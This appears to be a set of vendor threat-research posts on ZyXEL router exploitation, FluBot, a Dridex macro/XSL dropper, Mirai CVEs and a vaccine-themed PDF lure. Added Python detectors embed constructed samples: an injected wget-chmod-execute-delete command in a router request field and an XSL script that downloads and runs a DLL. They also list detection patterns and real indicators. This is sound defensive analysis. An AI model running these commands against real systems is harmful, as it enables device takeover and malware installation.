
Attackers actively targeting vulnerable ZyXEL routers

SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in ZyXEL products. TrueOnline is a major internet service provider in Thailand which distributes various rebranded ZyXEL routers to its customers.

Command Injection Vulnerability CVE-2017-18368

The ZyXEL P660HN-T router distributed by TrueOnline is prone to a command injection vulnerability in the Remote System Log forwarding function. This function is accessible to an unauthenticated user. The vulnerability is in the ViewLog.asp page and can be exploited through the remote_host parameter.

The following exploit was spotted in the wild:

This router has a command injection vulnerability in the Maintenance > Logs > System Log > Remote System Log forwarding function. The vulnerability lies in the ViewLog.asp page, which is reachable without authentication. Because no credentials are required, the attacker simply appends shell commands to the remote_host parameter of the POST request.

The attacker injects a wget command to download a malicious executable into the /tmp directory, sets its permissions to 777 (readable, writable and executable by all users), executes it, and then deletes it to leave no trace.
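The request pattern described above can be caught on the wire with a fairly narrow check: a POST to ViewLog.asp whose remote_host value is not a plain hostname or IP address. The following is an added example of that check, not SonicWall's signature logic; the two requests in it are constructed (the /cgi-bin/ prefix, the attacker IP 198.51.100.7, the file name bins.sh and the second form field are assumptions that only follow the shape the post describes).

```python
"""Detect CVE-2017-18368 exploitation attempts in raw HTTP requests.

Added example for this post, not SonicWall's signature logic. The two
requests below are constructed: the exploit request mirrors the stages the
post describes (wget into /tmp, chmod 777, run, delete); the /cgi-bin/
prefix, the attacker IP 198.51.100.7 and the second form field are assumptions.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Shell metacharacters that never belong in a syslog host field.
SHELL_META = re.compile(r"[;|&`\r\n]|\$\(|\$\{")
# A legitimate remote_host is a hostname or an IPv4 literal.
VALID_HOST = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$")
# Post-exploitation stages observed in the wild, in the order they appear.
STAGES = [
    ("download", re.compile(r"\b(?:wget|curl|tftp)\b")),
    ("stage_in_tmp", re.compile(r"/tmp\b")),
    ("chmod_777", re.compile(r"\bchmod\s+(?:\+x|777)\b")),
    ("self_delete", re.compile(r"\brm\s+(?:-[rf]+\s+)?\S+")),
]

SAMPLE_EXPLOIT = (  # constructed; ';' is sent percent-encoded as a browser form would
    "POST /cgi-bin/ViewLog.asp HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "remote_host=10.0.0.1%3Bcd%20%2Ftmp%3Bwget%20http%3A%2F%2F198.51.100.7%2Fbins.sh"
    "%3Bchmod%20777%20bins.sh%3B.%2Fbins.sh%3Brm%20-rf%20bins.sh&remote_syslog=1"
)
SAMPLE_BENIGN = (  # constructed: a real syslog forwarding target
    "POST /cgi-bin/ViewLog.asp HTTP/1.1\r\n"
    "Host: 192.0.2.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "remote_host=syslog.corp.example&remote_syslog=1"
)


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, target, headers, body


def inspect_viewlog_request(raw):
    """Return a verdict dict; only POSTs to ViewLog.asp are inspected."""
    method, target, _headers, body = parse_http_request(raw)
    verdict = {"inspected": False, "malicious": False, "stages": [], "remote_host": None}
    if method != "POST" or not urlsplit(target).path.lower().endswith("/viewlog.asp"):
        return verdict
    verdict["inspected"] = True
    # parse_qs percent-decodes the value, so injected ';' separators reappear here.
    remote_host = parse_qs(body, keep_blank_values=True).get("remote_host", [""])[0]
    verdict["remote_host"] = remote_host
    if SHELL_META.search(remote_host) or not VALID_HOST.match(remote_host):
        verdict["malicious"] = True
        verdict["stages"] = [name for name, rx in STAGES if rx.search(remote_host)]
    return verdict


if __name__ == "__main__":
    for req in (SAMPLE_EXPLOIT, SAMPLE_BENIGN):
        print(inspect_viewlog_request(req))
```

The allow-list on the host field does the real work; the stage regexes only annotate what the injected command chain is trying to do, which is useful for triage but not needed for the block decision.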

SonicWall Capture Labs provides protection against this threat via the following signatures:

    • IPS 15168: ZyXEL Products Command Execution (CVE-2017-18368)
    • GAV: Tsunami.DN

This vulnerability is patched.

Threat Graph

IoCs:

107.174.133.119

b28a3fbf79afdbf3965b6890cb2a1a7c5a0bdb59e50e98f1e20389894c8d928b

 

Android FluBot infections continue but with a dip in numbers

Four suspects were arrested in March 2021 in Barcelona in connection with the Android banker FluBot. The majority of the malware's victims are located in Spain. However, even after the arrests, FluBot continues to spread, albeit in lower numbers.

The chart below shows a dip in FluBot samples in March compared to the previous 2 months:

 

Common application names used by this campaign that we identified are:

  • FedEx
  • DHL

Common package names used by this campaign that we identified are:

  • com.tencent.mm
  • com.tencent.mobileqq

Below is an analysis of a specific sample belonging to this campaign:

  • MD5: 1a2a4044cf18eed59e66c413db766145
  • Package Name: com.tencent.mm
  • Application Name: Fed Ex

 

The malware requests the following permissions:

  • android.permission.CALL_PHONE
  • android.permission.FOREGROUND_SERVICE
  • android.permission.INTERNET
  • android.permission.NFC
  • android.permission.QUERY_ALL_PACKAGES
  • android.permission.READ_CONTACTS
  • android.permission.READ_PHONE_STATE
  • android.permission.READ_SMS
  • android.permission.RECEIVE_BOOT_COMPLETED
  • android.permission.RECEIVE_SMS
  • android.permission.REQUEST_DELETE_PACKAGES
  • android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
  • android.permission.SEND_SMS
  • android.permission.WAKE_LOCK
  • android.permission.WRITE_SMS

Some of the sensitive actions these permissions make possible:

  • Access contacts
  • Place phone calls
  • Access SMS
  • Send SMS
  • Ignore battery optimizations, preventing the application from hibernating
  • Auto start the malware after device reboot
  • Access Internet

Upon installation, the malware requests access to Accessibility services:

 

In Android, the activity shown first when the user opens an app is referred to as the main activity. It is identified by an intent filter with action MAIN and category LAUNCHER. For the FluBot sample in question, the class declared as the main activity cannot be found among the classes in the code tree:

This indicates that the real code containing the main activity lives in a separate file, most likely decrypted and dropped locally when the malware runs.

As expected, a dex file is dropped during execution into the app_apkprotector_dex folder as classes-v1.dex and classes-v1.bin:

 

The classes-v1.bin file is in fact a .dex file and contains the malicious code that runs at runtime. The main activity class that could not be located earlier is present in this file:
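The three static observations above (a launcher activity that is missing from classes.dex, a package name that does not match the displayed label, and an accessibility service declared alongside SMS permissions) can be automated as a manifest triage. The following is an added example, not SonicWall's tooling. The manifest and the class list in it are constructed: package com.tencent.mm and the label "Fed Ex" follow the post, while the activity, service and packer class names are assumptions, and the class set stands in for what a dex parser would report for classes.dex.

```python
"""Static triage of an Android manifest, modelled on the FluBot sample above.

Added example, not SonicWall's tooling. The manifest and the class list are
constructed: package com.tencent.mm and label "Fed Ex" follow the post, while
the activity, service and packer class names are assumptions. DEX_CLASSES
stands in for what a dex parser would report for classes.dex.
"""
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace
BIND_A11Y = "android.permission.BIND_ACCESSIBILITY_SERVICE"
SMS_PERMS = {"android.permission.READ_SMS", "android.permission.RECEIVE_SMS",
             "android.permission.SEND_SMS", "android.permission.WRITE_SMS"}

MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.tencent.mm">
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="Fed Ex">
    <activity android:name=".ui.LauncherUI">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <service android:name=".svc.Helper" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
  </application>
</manifest>"""

# Constructed stand-in for the class list of classes.dex: only the packer's
# loader classes are present; the launcher activity is not.
DEX_CLASSES = {"com.tencent.mm.ProtectorApp", "com.tencent.mm.loader.NativeLoader"}


def _resolve(root, name):
    """Expand a relative component name (".Foo") against the package name."""
    return root.get("package") + name if name.startswith(".") else name


def launcher_activity(root):
    """Fully qualified class of the activity carrying the MAIN/LAUNCHER intent filter."""
    for act in root.iter("activity"):
        for flt in act.iter("intent-filter"):
            actions = {a.get(A + "name") for a in flt.iter("action")}
            cats = {c.get(A + "name") for c in flt.iter("category")}
            if "android.intent.action.MAIN" in actions and "android.intent.category.LAUNCHER" in cats:
                return _resolve(root, act.get(A + "name"))
    return None


def triage(manifest_xml, dex_classes):
    """Return package, label, main activity and a list of findings."""
    root = ET.fromstring(manifest_xml)
    main = launcher_activity(root)
    perms = {p.get(A + "name") for p in root.iter("uses-permission")}
    a11y = [_resolve(root, s.get(A + "name")) for s in root.iter("service")
            if s.get(A + "permission") == BIND_A11Y]
    findings = []
    if main and main not in dex_classes:
        findings.append("launcher activity %s is not in classes.dex: code is packed or dropped at runtime" % main)
    if perms & SMS_PERMS:
        findings.append("SMS permissions requested: " + ", ".join(sorted(perms & SMS_PERMS)))
    if a11y:
        findings.append("accessibility service declared: " + ", ".join(a11y))
    return {"package": root.get("package"),
            "label": root.find("application").get(A + "label"),
            "main_activity": main, "findings": findings}


if __name__ == "__main__":
    for line in triage(MANIFEST, DEX_CLASSES)["findings"]:
        print(line)
```

On a real APK the manifest is binary XML and must first be decoded (apktool or androguard do this); the checks themselves are unchanged.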

 

FluBot contains capabilities to receive the following commands and execute associated actions:

  • BLOCK
  • SOCKS
  • UPLOAD_SMS
  • OPEN_URL
  • NOTIF_INT_TOGGLE
  • RUN_USSD
  • DISABLE_PLAY_PROTECT
  • RELOAD_INJECTS
  • SEND_SMS
  • GET_CONTACTS
  • RETRY_INJECT
  • UNINSTALL_APP
  • CARD_BLOCK
  • SMS_INT_TOGGLE

The command AMI_DEF_SMS_APP requests the user to set the FluBot app as the default SMS application on the device:

 

The command CARD_BLOCK shows a fake card details activity to the user which is used to steal Credit Card information:

 

FluBot is hard to remove because it abuses the accessibility services it was granted. If a victim tries the usual route of Settings > Apps > Fed Ex (or whatever name the sample uses), the malware force-closes the Settings app and displays the message “You can not perform this action on a service system”.

 

FluBot uses a Domain Generation Algorithm (DGA) to locate its C&C servers. As shown below, a single APK contacts a number of different domains:

 

SonicWall Capture Labs provides protection against this threat with the following signature:

  • AndroidOS.FluBot.CL (Trojan)

 

Indicators of Compromise (IOCs):

  • 1a2a4044cf18eed59e66c413db766145
  • 74f88d5480aefe165721c36100dcf89a
  • 3759f4ae5378372d34be6022c31c306c

Fake SpaceX Starbase Invite Excel document found distributing Dridex

The SonicWall Capture Labs Threat Research Team has observed a fake SpaceX Starbase invite being circulated by email with a malicious Excel document attached. When the attachment is opened and content is enabled, its VBA macro infects the system with Dridex.

Infection Cycle

Upon opening the attachment, the user is displayed instructions to enable content as shown below:


Fig-1: Excel File

The malicious Excel file contains an obfuscated macro with a Workbook_Open handler, which runs as soon as the document is opened with macros enabled. The VBA macro drops an XSL file to %appdata%\<random>.xsl. The dropped XSL file is then executed by passing it as an argument to WMIC (the Windows Management Instrumentation Command-line utility).


Fig-2: VBA Macro creating XSL file

XSL file

XSL files are style sheets for transforming XML data; Microsoft's XSL processor also supports embedding and executing script inside them. This long-known technique is tracked as MITRE ATT&CK T1220 (XSL Script Processing).

The XSL file contains JScript code that downloads and executes the payload. The payload is launched with “validateLog” as an argument, as shown below:


Fig-3: Contents of XSL file
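Two checks cover this stage of the chain: WMIC only executes a stylesheet through its /format: switch, and the stock stylesheets it ships with are referenced by bare name, so a /format: value that is a path, an extension or a URL is the tell (T1220); and the XSL itself carries the script in an msxsl:script element, which is easy to extract. The following is an added example of both checks, not SonicWall's detection logic. The process log lines and the XSL in it are constructed: the file names, the remote URL and the rundll32 launch of the downloaded DLL with "validateLog" are assumptions that only follow the shape the post describes.

```python
"""Two checks for XSL Script Processing (ATT&CK T1220) as used in the Dridex
chain above: flag wmic /format: invocations that load a stylesheet from a
custom location, and extract embedded script blocks from an XSL file.

Added example, not SonicWall's detection logic. The process log lines and
the XSL are constructed; file names, the remote URL and the rundll32 launch
with "validateLog" are assumptions following the shape the post describes.
"""
import re
import xml.etree.ElementTree as ET

MSXSL_NS = "urn:schemas-microsoft-com:xslt"
# wmic ... /format:<name>; stock stylesheets live in System32\wbem and are
# referenced by bare name, so a path, extension or URL is the anomaly.
WMIC_FORMAT = re.compile(r"\bwmic(?:\.exe)?\b.*?/format:\s*['\"]?([^\s'\"]+)", re.I)
BUILTIN_FORMATS = {"list", "table", "csv", "hform", "htable", "xml",
                   "mof", "rawxml", "textvaluelist", "value"}

SAMPLE_PROCESS_LOG = [  # constructed: parent -> command line
    'EXCEL.EXE -> wmic os get /format:"C:\\Users\\victim\\AppData\\Roaming\\rtqjx.xsl"',
    "explorer.exe -> wmic.exe process list brief",
    "cmd.exe -> wmic /node:fileserver os get /format:list",
    "powershell.exe -> wmic process get /format:https://example.invalid/a.xsl",
]

SAMPLE_XSL = r"""<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:user">
  <xsl:output method="text"/>
  <msxsl:script implements-prefix="user" language="JScript"><![CDATA[
    function run() {
      var http = new ActiveXObject("MSXML2.XMLHTTP");
      http.open("GET", "https://example.invalid/x.php", false);
      http.send();
      var dll = "C:\\Windows\\Temp\\qwerty.dll";
      new ActiveXObject("WScript.Shell").Run("rundll32 " + dll + ",validateLog", 0, false);
      return "";
    }
  ]]></msxsl:script>
  <xsl:template match="/"><xsl:value-of select="user:run()"/></xsl:template>
</xsl:stylesheet>"""


def wmic_xsl_hits(lines):
    """Return (line, format_target) for wmic calls whose /format: is not a stock name."""
    hits = []
    for line in lines:
        m = WMIC_FORMAT.search(line)
        if m and m.group(1).lower() not in BUILTIN_FORMATS:
            hits.append((line, m.group(1)))
    return hits


def xsl_script_blocks(xsl_text):
    """List embedded msxsl:script blocks with language, prefix, ActiveX objects and URLs."""
    root = ET.fromstring(xsl_text)
    blocks = []
    for el in root.iter("{%s}script" % MSXSL_NS):
        code = el.text or ""  # CDATA content is exposed as plain text
        blocks.append({
            "language": el.get("language"),
            "prefix": el.get("implements-prefix"),
            "activex": sorted(set(re.findall(r'ActiveXObject\("([^"]+)"\)', code))),
            "urls": re.findall(r"https?://[^\s\"']+", code),
        })
    return blocks


if __name__ == "__main__":
    for line, target in wmic_xsl_hits(SAMPLE_PROCESS_LOG):
        print("suspicious wmic stylesheet:", target)
    for block in xsl_script_blocks(SAMPLE_XSL):
        print(block)
```

The command-line check is the one worth alerting on: legitimate administration almost never points /format: at a user-writable path, and the parent process here (Excel) makes it unambiguous.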

 

SonicWall Capture ATP protects against this threat as shown below:


Fig-4: Capture ATP report

 

Indicators of Compromise

SHA256 of malicious Excel files:

  • 21bf810cf015e8ffec9b844632a94274d9d387ad528e7d75adf116acea5a4d4b
  • 2355f05bca712ce31b1fef911395862eb34e73db7a3ca0a6bee2664024e47518
  • 376dad0f953db87ebfa71edb5173d4d8226c242d257a40cc9359f4d53b850aff
  • 466e4c5fe6b3c05ff34e487a0ba0910c1dc53b1c41ef1c27a779379bd2c9534d
  • 4d8ae33f7f5e41d9b3c3109daf043f5a803c639a68a697838bdcd17135c03730
  • 55a258190c8461b2aec9e698edb85297f2c850de44e6659529b00a0af7c98fe6
  • a5bc04a9b80ebb1b62367b8fec7463da3b0d096bc99c798f7ecf1f048580729c
  • af686418e437e9dca34e08381e3dc8e5f3aa06a458e610d9095ce2eb0a00ebc4
  • c83e3d04d0807dbb1144f776ab144e9b85c94b0c0e8ca05f78664e6e46f621cd
  • ee3755902532f4636d3a8a86de2f9bc13ae235a9220f97a8862d82bc52599066

Network Connections:

  • https://new[.]bombill[.]com/B2B/js/public_html/new[.]bombill[.]com/kML98YVm1[.]php
  • https://mishpachton[.]club/wp-content/uploads/2020/01/sULnmh1mel6Ha[.]php
  • https://hotelmarissa[.]ro/hms/highslide/graphics/outlines/aKBRsNGhkJnFy[.]php
  • https://lekkievents[.]com/RcjJztqmB3CJ[.]php
  • https://slasinfo[.]com/wp-content/plugins/better-wp-security/core/Z3w9lRfmiUeqn[.]php
  • https://turktech[.]co[.]uk/wp-content/uploads/2020/01/XBKtCe6h[.]php
  • https://marcosindiagroup[.]com/wp-content/uploads/elementor/css/Y1KA13a0oHq0vv[.]php
  • https://drakarys[.]rs/img/icons/tabs/xTPpiyC3[.]php
  • https://jettyplus[.]com/wp-includes/sodium_compat/namespaced/Core/n95mTqnEYm2lEqF[.]php
  • https://desertkingresort[.]com/wp-includes/js/mediaelement/renderers/Qh3RRz2g[.]php
  • https://elivebox[.]net/school/bower_components/chosen/docsupport/7Il9rC5wQ[.]php
  • https://eletronicaeduardo[.]com[.]br/www3/sistema/application/config/ANBPUKvb49gQn[.]php
  • https://mail[.]beetleorchid[.]in//i07uqfyKKQ3jUN8[.]php
  • https://nationalngofederation[.]com/wp-includes/SimplePie/Decode/HTML/CQiRG6YtYGt[.]php
  • https://leer-afrikaans[.]co[.]za/5TdZj0lfsvo[.]php
  • https://mail[.]account[.]inventorybiz[.]com//X70ySsjm2[.]php
  • https://elkytoursandtravel[.]com/wp-includes/SimplePie/Decode/HTML/i06d5d4XcypWc[.]php
  • https://drlamyas[.]net/wp-content/plugins/LayerSlider/classes/gt45kDacR6[.]php
  • https://one2onematch[.]net/back_up/under/fonts/Montserrat/kDCn9x8aeY8jz[.]php
  • https://centrodetraduccionespuce[.]com/intranet_old/css/vendor/square/risWzMrGzRtO4bS[.]php
  • https://askcon[.]net/wp-includes/SimplePie/Content/Type/0lOzUuHLScUH[.]php
  • https://crm[.]sgdatapos[.]com/modules/goals/language/bulgarian/vdOwNUr2yXh[.]php
  • https://lweonepal[.]com/wp-content/cache/object/013/bFPs28xfQyOe[.]php
  • https://triplonet[.]com[.]br/__MACOSX/wp-includes/js/codemirror/3Uqzx5RTyl8pT[.]php
  • https://casagrandecontabil[.]com[.]br/vo/vfm-admin/images/avatars/1Wu2EdUfRb3q7Zu[.]php
  • https://ppdb[.]smp1sbw[.]sch[.]id/ro-plugins/ckeditor/skins/moono-lisa/767884gnQIu[.]php
  • https://blog[.]garantitorna[.]com/wp-includes/css/dist/block-directory/j9nCiyCAcJQDh3[.]php
  • https://dikan[.]co[.]za/wsz2SCI6sU6k6o[.]php
  • https://elearn[.]empoweredmw[.]com/lib/minify/matthiasmullie-minify/data/WD3Uawo4EEZ[.]php
  • https://equiposautomotriz[.]com/wp-includes/Requests/Exception/HTTP/U997eIiQSqs3[.]php
  • https://familystory[.]es/wp-content/uploads/2021/01/InOm7e9u4vMmW[.]php
  • https://fortgem[.]co[.]uk/wp-includes/css/dist/block-directory/Pk57G2yz[.]php
  • https://sproca[.]tg/wp-content/themes/agronomics-lite/css/nj6N9LQhADNC[.]php
  • https://tarifacabins[.]com/wp-includes/js/mediaelement/renderers/KcsChOSuEV[.]php
  • https://gesky[.]co[.]tz/wp-includes/sodium_compat/namespaced/Core/HMJi1PQC[.]php
  • https://birkett[.]com[.]au/include/Base/Modules/Filter/KZyRSXJtoC[.]php
  • https://dentaldesignstudiowi[.]com/wp-content/uploads/2021/01/9eFsntMZ[.]php

SHA256 of Dridex payload:

  • a095a0ec3cd1655bbabad3f3b2e996521444c93dc51f1e78af878bfef3fd3ca8
  • c190c5a25b2616a4a0c4965d5f83cc47e47f2d2e4d2cab2c8987dcc29db290a3

Dropped Files:

  • %appdata%\<random>.xsl
  • C:\windows\Temp\<random>.dll

Critical Vulnerabilities Of Network Security Devices Being Utilized By Mirai Botnet Malware

The SonicWall Capture Labs Threat Research team has received reports of a new Mirai botnet variant targeting network security devices. The campaign exploits critical vulnerabilities across several brands of internet-connected network security devices. The following vulnerabilities are involved:

  • CVE-2020-25506: D-Link DNS-320 firewall exploit
  • CVE-2021-27561: Yealink Device Management remote code-execution (RCE)
  • CVE-2021-27562: Yealink Device Management remote code-execution (RCE)
  • CVE-2020-26919: Netgear ProSAFE Plus exploit
  • CVE-2021-22502: Micro Focus Operation Bridge Reporter RCE
  • CVE-2019-19356: Netis WF2419 Wireless Router Remote Code Execution (RCE)
  • VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability

On March 16, 2021, SonicWall Capture Labs Threat Research team released the following signatures to protect against such attacks:

  • CVE-2020-25506
    IPS:15455 D-Link DNS-320 system_mgr.cgi Command Injection
  • CVE-2021-27561/CVE-2021-27562
    IPS:15456 Yealink DM Remote Code Execution
  • CVE-2021-22502
    IPS:15457 Micro Focus Operations Bridge Reporter Command Injection
  • CVE-2019-19356
    IPS:15458 Netis WF2419 netcore_set.cgi Remote Code Execution
  • VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability
    This is an old vulnerability. SonicWall released the patch for this vulnerability in 2015. There are also existing signatures detecting it:
    IPS:5603 GNU Bash Code Injection (CVE-2014-6271) 2
    IPS:13064 GNU Bash Code Injection (CVE-2014-6278)
  • GAV signatures to cover malware samples:
    GAV: Mirai.LL
    GAV: Mirai.LL_1

 

Fake Covid-19 vaccine-related information found spreading malware

As Covid-19 vaccinations happen across the country, cybercriminals are riding the wave again using social engineering tactics purporting to be vaccine-related information to spread malware and steal user information. The Sonicwall Capture Labs Research team has analyzed a malicious PDF befittingly named “Adenovirus vector.pdf” which pertains to one of the viral vectors used in some late-stage COVID-19 vaccine trials according to the CDC website.

Infection Cycle:

The file arrives as a PDF, likely as a spam email attachment, under the following filename:

  • Adenovirus vector.pdf

Once opened, the victim is presented with a fake “I'm not a robot” CAPTCHA which, when clicked, redirects to a malicious website.

One redirect leads to a seemingly unending chain of redirects through a slew of ad websites, which eventually ask the victim to download a malicious browser extension called “Security Helper”.

The pages then scare the user into believing the system is infected by displaying fake scan results purporting to come from well-known antivirus vendors such as McAfee and Norton, with links on how to “fix” the problem and purchase protection that lead to yet another dubious website.

  

These fake security pop-ups keep coming because the malicious websites have been added to the browser's notification “allow” list, which permits them to keep sending notifications.

It comes as no surprise that cybercriminals take advantage of current events such as the pandemic and the vaccine rollout to spread malware. We therefore urge our users to obtain vaccine-related information and services only from trusted websites or sources, and to exercise caution when downloading software from unfamiliar websites.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Malagent.N_107 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Microsoft Security Bulletin Coverage for March 2021

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft's security advisories for the month of March 2021. The list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2021-24095 DirectX Elevation of Privilege Vulnerability
ASPY 5907: Malformed-File exe.MP.131

CVE-2021-26411 Internet Explorer Memory Corruption Vulnerability
IPS 15430: Internet Explorer Memory Corruption Vulnerability (CVE-2021-26411)

CVE-2021-26855 Microsoft Exchange Server Remote Code Execution Vulnerability
IPS 15420: Microsoft Exchange Server Remote Code Execution ( CVE-2021-26855) 2

CVE-2021-26857 Microsoft Exchange Server Remote Code Execution Vulnerability
ASPY 158: Malformed-File xml.MP.4

CVE-2021-26863 Windows Win32k Elevation of Privilege Vulnerability
ASPY 160: Malformed-File exe.MP.171

CVE-2021-26868 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 161: Malformed-File exe.MP.172

CVE-2021-26877 Windows DNS Server Remote Code Execution Vulnerability
IPS 15434: Windows DNS Server Remote Code Execution (CVE-2021-26877)

CVE-2021-26897 Windows DNS Server Remote Code Execution Vulnerability
IPS 15435: Windows DNS Server Remote Code Execution (CVE-2021-26897)

CVE-2021-27076 Microsoft SharePoint Server Remote Code Execution Vulnerability
ASPY 162: Malformed-File exe.MP.173

CVE-2021-27077 Windows Win32k Elevation of Privilege Vulnerability
ASPY 163: Malformed-File ex.MP.174

CVE-2021-27065 Microsoft Exchange Server Remote Code Execution Vulnerability
IPS 15421: Microsoft Exchange Server Remote Code Execution 1

CVE-2021-27078 Microsoft Exchange Server Remote Code Execution Vulnerability
IPS 15421: Microsoft Exchange Server Remote Code Execution 1

The following vulnerabilities have no known exploits in the wild:
CVE-2021-1640 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-1729 Windows Update Stack Setup Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-21300 Git for Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-24089 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-24090 Windows Error Reporting Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-24104 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2021-24107 Windows Event Tracing Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-24108 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-24110 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26412 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26854 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26858 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26859 Microsoft Power BI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-26860 Windows App-V Overlay Filter Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26861 Windows Graphics Component Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26862 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26864 Windows Virtual Registry Provider Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26865 Windows Container Execution Agent Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26866 Windows Update Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26867 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26869 Windows ActiveX Installer Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-26870 Windows Projected File System Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26871 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26872 Windows Event Tracing Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26873 Windows User Profile Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26874 Windows Overlay Filter Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26875 Windows Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26876 OpenType Font Parsing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26878 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26879 Windows NAT Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-26880 Storage Spaces Controller Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26881 Microsoft Windows Media Foundation Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26882 Remote Access API Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26884 Windows Media Photo Codec Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-26885 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26886 User Profile Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-26887 Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26889 Windows Update Stack Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26890 Application Virtualization Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26891 Windows Container Execution Agent Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26892 Windows Extensible Firmware Interface Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2021-26893 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26894 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26895 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-26896 Windows DNS Server Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2021-26898 Windows Event Tracing Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26899 Windows UPnP Device Host Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26900 Windows Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26901 Windows Event Tracing Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2021-26902 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27047 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27048 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27049 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27050 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27051 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27052 Microsoft SharePoint Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2021-27053 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2021-27054 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
